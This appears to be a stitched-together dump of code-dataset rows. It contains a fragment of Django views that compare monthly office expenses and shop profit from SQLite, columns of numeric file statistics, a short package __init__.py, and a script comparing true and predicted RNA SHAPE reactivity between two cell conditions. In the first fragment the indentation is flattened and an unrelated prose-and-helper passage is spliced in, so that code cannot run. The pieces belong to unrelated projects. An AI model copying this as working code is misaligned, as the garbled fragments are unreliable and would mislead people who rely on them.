for key in c.fetchall():
Month.append(key[0])
Amount.append(key[1])
if(Amount[len(Amount)-1]<Amount[len(Amount)-2]):
mar=Amount[len(Amount)-2]-Amount[len(Amount)-1]
per=(mar/Amount[len(Amount)-2])*100
s=("The total Office Expenses in %s is less than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% decline in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
elif(Amount[len(Amount)-1]>Amount[len(Amount)-2]):
mar=Amount[len(Amount)-1]-Amount[len(Amount)-2]
per=(mar/Amount[len(Amount)-1])*100
s=("The total Office Expenses in %s is more than the Office Expenses in %s by a margin of Rs. %d . There is a %.2f%% increase in Office Expenses" % (Month[len(Month)-1],Month[len(Month)-2],mar,per))
else:
s=("The total Office Expenses in %s is equal to the Office Expenses in %s. There is no change in Office expenses" % (Month[len(Month)-1],Month[len(Month)-2]))
return render(request, 'test.htm', {'str':s})
def profitchartcrm(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,7) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,7)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,7) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,7)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,7) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,7)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
for i in range(0, len(SAmount)):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
    if res_list[-1] < res_list[-2]:
        mar = abs(res_list[-2] - res_list[-1])
        per = abs((mar / res_list[-2]) * 100)
        s = ("The total Revenue in %s is less than the Revenue in %s by a margin of Rs. %d. There is a %.2f%% decline in Revenue. The shop is in loss" % (Month[-1], Month[-2], mar, per))
    elif res_list[-1] > res_list[-2]:
        mar = abs(res_list[-1] - res_list[-2])
        per = abs((mar / res_list[-1]) * 100)
        s = ("The total Revenue in %s is more than the Revenue in %s by a margin of Rs. %d. There is a %.2f%% increase in Revenue. The shop is in gain" % (Month[-1], Month[-2], mar, per))
    else:
        s = ("The total Revenue in %s is equal to the Revenue in %s. There is no change in Revenue" % (Month[-1], Month[-2]))
return render(request, 'test.htm', {'str':s})
def profitchartcry(request):
conn=sqlite3.connect('db.sqlite3')
c=conn.cursor()
c.execute('SELECT substr(Date_of_Purchase,1,4) as "Month", sum(Total_amount) as PAmount, Purchase_id from Purchase group by substr(Date_of_Purchase,1,4)')
Month=[]
PAmount=[]
for key in c.fetchall():
Month.append(key[0])
PAmount.append(key[1])
c.execute('SELECT substr(Date_of_order,1,4) as "SMonth", sum(Total_amount) as SAmount, Invoice_no from Sales group by substr(Date_of_order,1,4)')
SMonth=[]
SAmount=[]
for key in c.fetchall():
SMonth.append(key[0])
SAmount.append(key[1])
c.execute('SELECT substr(Expenditure_date,1,4) as "OMonth", sum(Amount) as OEAmount, Expenditure_id from Office_Expense group by substr(Expenditure_date,1,4)')
OEAmount=[]
for key in c.fetchall():
OEAmount.append(key[1])
res_list = []
for i in range(0, len(SAmount)):
res_list.append(SAmount[i]-(PAmount[i] + OEAmount[i]))
    if res_list[-1] < res_list[-2]:
        mar = abs(res_list[-2] - res_list[-1])
        per = abs((mar / res_list[-2]) * 100)
        s = ("The total Revenue in %s is less than the Revenue in %s by a margin of Rs. %d. There is a %.2f%% decline in Revenue. The shop is in loss" % (Month[-1], Month[-2], mar, per))
    elif res_list[-1] > res_list[-2]:
        mar = abs(res_list[-1] - res_list[-2])
        per = abs((mar / res_list[-1]) * 100)
        s = ("The total Revenue in %s is more than the Revenue in %s by a margin of Rs. %d. There is a %.2f%% increase in Revenue. The shop is in gain" % (Month[-1], Month[-2], mar, per))
    else:
        s = ("The total Revenue in %s is equal to the Revenue in %s. There is no change in Revenue" % (Month[-1], Month[-2]))
return render(request, 'test.htm', {'str':s})
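The five chart views above repeat the same last-two-periods comparison. A minimal refactoring sketch follows; the helper name compare_last_two is hypothetical and not part of the original file, and it guards the views' implicit assumptions (at least two periods, non-zero reference amount):

def compare_last_two(label, months, amounts):
    # Guard the assumption that at least two periods exist.
    if len(amounts) < 2:
        return "Not enough %s data to compare across periods" % label
    prev, last = amounts[-2], amounts[-1]
    if last == prev:
        return ("The total %s in %s are equal to the %s in %s. There is no change in %s"
                % (label, months[-1], label, months[-2], label))
    mar = abs(last - prev)
    base = prev if last < prev else last  # same denominator choice as the views above
    per = (mar / base) * 100 if base else 0.0
    trend = ("less", "decline") if last < prev else ("more", "increase")
    return ("The total %s in %s are %s than the %s in %s by a margin of Rs. %d. "
            "There is a %.2f%% %s in %s"
            % (label, months[-1], trend[0], label, months[-2], mar, per, trend[1], label))

# e.g. s = compare_last_two('purchases', Month, Amount)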
| 39.94605
| 297
| 0.625024
| 3,072
| 20,732
| 4.148438
| 0.057943
| 0.042373
| 0.070621
| 0.037665
| 0.845339
| 0.843063
| 0.812068
| 0.812068
| 0.812068
| 0.812068
| 0
| 0.023484
| 0.223616
| 20,732
| 519
| 298
| 39.94605
| 0.768265
| 0
| 0
| 0.783715
| 0
| 0.124682
| 0.362948
| 0.067029
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081425
| false
| 0
| 0.015267
| 0.030534
| 0.185751
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 40d06c7715fd6cd7c01531080f9c708b51464f5e
| 150
| py
| Python
| powspechi/__init__.py
| m33ra/HI_powspec
| 1a60cd55501b54a1cc391817860e0b80dba6c5f8
| ["MIT"] | 4
| 2019-10-05T16:34:07.000Z
| 2019-10-09T12:22:10.000Z
| powspechi/__init__.py
| m33ra/powspechi
| 1a60cd55501b54a1cc391817860e0b80dba6c5f8
| ["MIT"] | null | null | null
| powspechi/__init__.py
| m33ra/powspechi
| 1a60cd55501b54a1cc391817860e0b80dba6c5f8
| ["MIT"] | null | null | null |
from powspechi.monte_carlos import *
from powspechi.maps_manip import *
from powspechi.powspec_calc import *
from powspechi.powspec_analysis import *
| 30
| 40
| 0.84
| 20
| 150
| 6.1
| 0.5
| 0.42623
| 0.467213
| 0.42623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 41
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 8
| dc04a6e5df4fc905d10b6d6b25ee4079b160679b
| 26,783
| py
| Python
| structureimpute/explore/compare_same_seq_true_and_predict_of_two_condition.py
| Tsinghua-gongjing/StructureImpute
| 59e33e913998a8841c2cb552828f0f0cc19ebc21
| ["MIT"] | 9
| 2021-11-17T11:27:41.000Z
| 2022-03-04T10:27:37.000Z
| structureimpute/explore/compare_same_seq_true_and_predict_of_two_condition.py
| Tsinghua-gongjing/StructureImpute
| 59e33e913998a8841c2cb552828f0f0cc19ebc21
| ["MIT"] | null | null | null
| structureimpute/explore/compare_same_seq_true_and_predict_of_two_condition.py
| Tsinghua-gongjing/StructureImpute
| 59e33e913998a8841c2cb552828f0f0cc19ebc21
| ["MIT"] | null | null | null |
from __future__ import print_function
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
sns.set(style="ticks")
sns.set_context("poster")
plt.rcParams["font.family"] = "Helvetica"
import sys, os
from nested_dict import nested_dict
import pandas as pd
import numpy as np
from pyfasta import Fasta
import os
import re
import torch
import time
from termcolor import colored
import util
import argparse
from scipy import stats
from matplotlib.backends.backend_pdf import PdfPages
import compare_true_and_predict
def read_validate_predict(validate, predict):
cols = ['tx', 'length', 'start', 'end', 'mean_reactivity', 'null_pct','seq','fragment_shape', 'fragment_shape(true)']
df_validate = pd.read_csv(validate, header=None, sep='\t')
df_validate.columns = cols
df_predict = pd.read_csv(predict, header=None, sep='\t')
df_predict.columns = ['fragment_shape(predict)']
if df_validate.shape[0] != df_predict.shape[0]:
        print('validate ({}) and predict ({}) entry counts differ'.format(df_validate.shape[0], df_predict.shape[0]))
sys.exit()
df_validate['fragment_shape(predict)'] = df_predict['fragment_shape(predict)']
print(df_validate.shape, df_validate.head())
return df_validate
def compare_predict(validation_ls, predict_ls, label_ls, savefn, bases='AC'):
validation_ls = validation_ls.split(':')
predict_ls = predict_ls.split(':')
label_ls = label_ls.split(':')
df_validate_dict = nested_dict(1, list)
for validate,predict,label in zip(validation_ls, predict_ls, label_ls):
df_validate = read_validate_predict(validate, predict)
df_validate_dict[label] = df_validate
df_validate_merge = df_validate_dict[label_ls[0]].merge(df_validate_dict[label_ls[1]], on=['tx', 'start', 'end'])
df_validate_merge['corr'] = [stats.pearsonr(list(map(float, i.split(','))),list(map(float, j.split(','))))[0] for i,j in zip(df_validate_merge['fragment_shape(true)_x'], df_validate_merge['fragment_shape(true)_y'])]
df_validate_merge.sort_values(by=['corr'], inplace=True, ascending=False)
df_validate_merge['mean_reactivity_x_predict'] = [np.mean([i_v for i_v,j_base in zip(list(map(float, i.split(','))), list(j)) if j_base in bases and i_v>=0]) for i,j in zip(df_validate_merge['fragment_shape(predict)_x'], df_validate_merge['seq_x'])]
df_validate_merge['mean_reactivity_y_predict'] = [np.mean([i_v for i_v,j_base in zip(list(map(float, i.split(','))), list(j)) if j_base in bases and i_v>=0]) for i,j in zip(df_validate_merge['fragment_shape(predict)_y'], df_validate_merge['seq_y'])]
print('merge', df_validate_merge.shape, df_validate_merge.head())
    pdf = PdfPages(savefn)  # PdfPages is already imported above
mean_null_dict = nested_dict(1, list)
for n,(tx,start,end,s1,s2,s3,s4,s5,s6,seq) in enumerate(zip(df_validate_merge['tx'],df_validate_merge['start'],df_validate_merge['end'],df_validate_merge['fragment_shape_x'],df_validate_merge['fragment_shape(true)_x'],df_validate_merge['fragment_shape(predict)_x'],df_validate_merge['fragment_shape_y'],df_validate_merge['fragment_shape(true)_y'],df_validate_merge['fragment_shape(predict)_y'],df_validate_merge['seq_x'])):
title = '{}:{}-{}'.format(tx,start,end)
if n<=100:
s3 = ','.join([i if j in 'AC' else '-1' for i,j in zip(s3.split(','),seq)])
s6 = ','.join([i if j in 'AC' else '-1' for i,j in zip(s6.split(','),seq)])
fig = compare_true_and_predict.plot_bar(shape_ls=[s1,s2,s3,s4,s5,s6], seq=seq, label_ls=['NULL1','True1','Predict1','NULL2','True2','Predict2'], savefn=None, pdf=pdf, title=title, ylim_ls=[[-0.1,1.1],[-0.1,1.1],[-0.1,1.1],[-0.1,1.1],[-0.1,1.1],[-0.1,1.1]])
mean_null1 = np.mean([j for i,j in zip(list(map(float, s1.split(','))), list(map(float, s2.split(',')))) if i == -1])
mean_null2 = np.mean([j for i,j in zip(list(map(float, s1.split(','))), list(map(float, s3.split(',')))) if i == -1])
mean_null3 = np.mean([j for i,j in zip(list(map(float, s4.split(','))), list(map(float, s5.split(',')))) if i == -1])
mean_null4 = np.mean([j for i,j in zip(list(map(float, s4.split(','))), list(map(float, s6.split(',')))) if i == -1])
mean_null_dict['mean_null_x'].append(mean_null1)
mean_null_dict['mean_null_x_predict'].append(mean_null2)
mean_null_dict['mean_null_y'].append(mean_null3)
mean_null_dict['mean_null_y_predict'].append(mean_null4)
for i,j in mean_null_dict.items():
df_validate_merge[i] = j
plt.close()
pdf.close()
df_validate_merge.to_csv(savefn.replace('.pdf','.txt'), header=True, index=False, sep='\t')
col_ls = ['mean_reactivity_x', 'mean_reactivity_x_predict', 'mean_reactivity_y', 'mean_reactivity_y_predict']
df_plot_mean = df_validate_merge.loc[:, col_ls].mean(axis=0)
fig,ax=plt.subplots()
for i in df_validate_merge.index:
ax.plot(range(0, len(col_ls)), df_validate_merge.loc[i, col_ls], color='grey', lw=0.8, alpha=0.5)
ax.plot(range(0, len(col_ls)), df_plot_mean, color='blue', lw=1.2)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.pdf'))
plt.close()
fig,ax=plt.subplots(figsize=(8,8))
df_validate_merge[col_ls].plot(kind='box')
r1,p1 = stats.ttest_ind(df_validate_merge['mean_reactivity_x'],df_validate_merge['mean_reactivity_x_predict'])
r2,p2 = stats.ttest_ind(df_validate_merge['mean_reactivity_y'],df_validate_merge['mean_reactivity_y_predict'])
r3,p3 = stats.ttest_ind(df_validate_merge['mean_reactivity_x'],df_validate_merge['mean_reactivity_y'])
r4,p4 = stats.ttest_ind(df_validate_merge['mean_reactivity_x_predict'],df_validate_merge['mean_reactivity_y_predict'])
title = 'n={}; p1: {:.3f}, p2: {:.3f}, \np3: {:.3f}, p4:{:.3f}'.format(df_validate_merge.shape[0], p1,p2,p3,p4)
plt.title(title)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.box.pdf'))
plt.close()
col_ls = ['mean_null_x', 'mean_null_x_predict', 'mean_null_y', 'mean_null_y_predict']
df_plot_mean = df_validate_merge.loc[:, col_ls].mean(axis=0)
fig,ax=plt.subplots()
for i in df_validate_merge.index:
ax.plot(range(0, len(col_ls)), df_validate_merge.loc[i, col_ls], color='grey', lw=0.8, alpha=0.5)
ax.plot(range(0, len(col_ls)), df_plot_mean, color='blue', lw=1.2)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.null.pdf'))
plt.close()
fig,ax=plt.subplots(figsize=(8,8))
df_validate_merge[col_ls].plot(kind='box')
r1,p1 = stats.ttest_ind(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_x_predict'])
r2,p2 = stats.ttest_ind(df_validate_merge['mean_null_y'],df_validate_merge['mean_null_y_predict'])
r3,p3 = stats.ttest_ind(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_y'])
r4,p4 = stats.ttest_ind(df_validate_merge['mean_null_x_predict'],df_validate_merge['mean_null_y_predict'])
# p1 = stats.ks_2samp(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_x_predict'])[1]
# p2 = stats.ks_2samp(df_validate_merge['mean_null_y'],df_validate_merge['mean_null_y_predict'])[1]
# p3 = stats.ks_2samp(df_validate_merge['mean_null_x'],df_validate_merge['mean_null_y'])[1]
# p4 = stats.ks_2samp(df_validate_merge['mean_null_x_predict'],df_validate_merge['mean_null_y_predict'])[1]
title = 'n={}; p1: {:.3f}, p2: {:.3f}, \np3: {:.3f}, p4:{:.3f}'.format(df_validate_merge.shape[0], p1,p2,p3,p4)
plt.title(title)
plt.tight_layout()
plt.savefig(savefn.replace('.pdf','.mean.null2.pdf'))
plt.close()
def main():
####################################################################
### define parser of arguments
parser = argparse.ArgumentParser(description='Plot correlation bar of multiple condition')
parser.add_argument('--validation_ls', type=str, help='Validation file list')
parser.add_argument('--predict_ls', type=str, help='Predict file list')
    parser.add_argument('--label_ls', type=str, help='Label list')
parser.add_argument('--savefn', type=str, default='/home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_cy.pdf', help='Path to plot file')
# get args
args = parser.parse_args()
util.print_args('Plot correlation bar of multiple condition', args)
compare_predict(validation_ls=args.validation_ls, predict_ls=args.predict_ls, label_ls=args.label_ls, savefn=args.savefn)
# validation_wc = '/home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt'
# predict_wc = '/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt'
# validation_ch = '/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt'
# predict_ch = '/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_cy_vivo_0.1.txt'
# validation_ls = ':'.join([validation_wc, validation_ch])
# predict_ls = ':'.join([predict_wc, predict_ch])
# label_ls = 'wc:ch'
# compare_predict(validation_ls=validation_ls, predict_ls=predict_ls, label_ls=label_ls, savefn=args.savefn)
if __name__ == '__main__':
main()
'''
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.NULLasWC.txt --predict_ls /home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt:/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_cy_vivo_0.1.NULLasWC.txt --label_ls wc:cy_sameNULL --savefn /home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_cy.NULLasWC.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.NULLasWC.txt --predict_ls /home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt:/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_ch_vivo_0.1.NULLasWC.txt --label_ls wc:ch_sameNULL --savefn /home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_ch.NULLasWC.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/validation_randomnullfragment/windowLen100.sliding100.validation.randomNperfragmentNullPct0.3.maxL20.S1234.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.NULLasWC.txt --predict_ls /home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.txt:/home/gongjing/project/shape_imputation/exper/b28_trainLossall_GmultiplyX_randomNperfragmentpct0.3L20x10_randomNperValidate2/prediction.validation_hek_np_vivo_0.1.NULLasWC.txt --label_ls wc:np_sameNULL --savefn /home/gongjing/project/shape_imputation/results/condition_compare_correlation.track.wc_vs_np.NULLasWC.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.1.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_np_vivo0.1.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.condition_compare_correlation.track.wc_vs_np.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.1.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_ch_vivo0.1.txt --label_ls wc:ch --savefn /home/gongjing/project/shape_imputation/results/c80.condition_compare_correlation.track.wc_vs_ch.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.1.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.1.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_cy_vivo0.1.txt --label_ls wc:ch --savefn /home/gongjing/project/shape_imputation/results/c80.condition_compare_correlation.track.wc_vs_cy.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_np_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.null0.3.condition_compare_correlation.track.wc_vs_np.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_cy_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.null0.3.condition_compare_correlation.track.wc_vs_cy.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c80_trainpct0.3x50_validate100M/prediction.hek_ch_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c80.null0.3.condition_compare_correlation.track.wc_vs_ch.pdf
# c94
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_np_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_np_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c94.null0.3.condition_compare_correlation.track.wc_vs_np.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_cy_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_cy_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c94.null0.3.condition_compare_correlation.track.wc_vs_cy.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/hek_wc_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.inwc6205.txt:/home/gongjing/project/shape_imputation/data/hek_ch_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.train+validation_truenull_randomNULL0.3.inwc6205.txt --predict_ls /home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_wc_vivo0.3_trainvalidationinwc6205.txt:/home/gongjing/project/shape_imputation/exper/c94_trainpct0.3x50_validate100M_monitorvalloss_train_hasnull_validate_hasnull/prediction.hek_ch_vivo0.3_trainvalidationinwc6205.txt --label_ls wc:np --savefn /home/gongjing/project/shape_imputation/results/c94.null0.3.condition_compare_correlation.track.wc_vs_ch.pdf
# d06
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_K562_vivo/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vivorandomNULL0.3.txt --label_ls DMSseq_K562_vitro:DMSseq_K562_vivo --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.K562_vitro_vs_vivo.pdf
python compare_same_seq_true_and_predict_of_two_condition.py --validation_ls /home/gongjing/project/shape_imputation/data/DMSseq_K562_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt:/home/gongjing/project/shape_imputation/data/DMSseq_fibroblast_vitro/3.shape/shape.c200T2M0m0.out.windowsHasNull/windowLen100.sliding100.validation_truenull_randomNULL0.3.txt --predict_ls /home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_K562_vitrorandomNULL0.3.txt:/home/gongjing/project/shape_imputation/exper/d06_DMSseq_K562_vitro_trainRandmask0.3x50_vallownull100_lossDMSloss_all/prediction.DMSseq_fibroblast_vitrorandomNULL0.3.txt --label_ls DMSseq_K562_vitro:DMSseq_fibroblast_vitro --savefn /home/gongjing/project/shape_imputation/results/d06.randomnull0.3.condition_compare_correlation.track.K562_vitro_vs_fibroblast_vitro.pdf
